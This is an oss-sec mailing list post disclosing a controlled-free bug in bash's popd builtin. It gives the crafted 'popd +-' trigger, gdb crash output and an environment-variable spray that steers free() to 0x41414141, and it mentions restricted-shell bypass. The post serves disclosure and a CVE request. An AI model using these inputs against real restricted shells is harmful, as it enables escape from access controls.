oss-sec mailing list archives
bash - popd controlled free
From: Fernando Muñoz <fernando () null-life com>
Date: Thu, 17 Nov 2016 12:04:49 -0500
bash - popd controlled free ==================== popd can be tricked to free a user supplied address in the following way: $ popd +-111111 This could be used to bypass restricted shells (rsh) on some environments to cause use-after-free. This was already reported to bash devs and only considered a bug, if Mitre consider it could have a security impact, please assign a CVE. Details ====== $ gdb bash ... (gdb) r -c 'popd +-67372036' The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/bashinstrumentado/bash-4.3/bash -c 'popd +-67372036' Program received signal SIGSEGV, Segmentation fault. 0x0827f93a in popd_builtin (list=<optimized out>) at ./pushd.def:384 384 free (pushd_directory_list[i]); (gdb) print pushd_directory_list[i] Cannot access memory at address 0x10101010 ---- $ export AA=`perl -e 'print "A"x100000'` $ gdb ./bash ... (gdb) x/s *((char **)environ+13) 0xbffe75d4: "AA=", 'A' <repeats 197 times>... (gdb) run -c 'popd +-805281142' The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/bash/bash-4.3/bash -c 'popd +-805281142' Program received signal SIGSEGV, Segmentation fault. internal_free (mem=0x41414141, file=0x83fb36c "./pushd.def", line=384, flags=<optimized out>) at malloc.c:863 863 if (p->mh_alloc == ISMEMALIGN) - Fernando
Current thread:
- bash - popd controlled free Fernando Muñoz (Nov 17)
- Re: bash - popd controlled free cve-assign (Nov 17)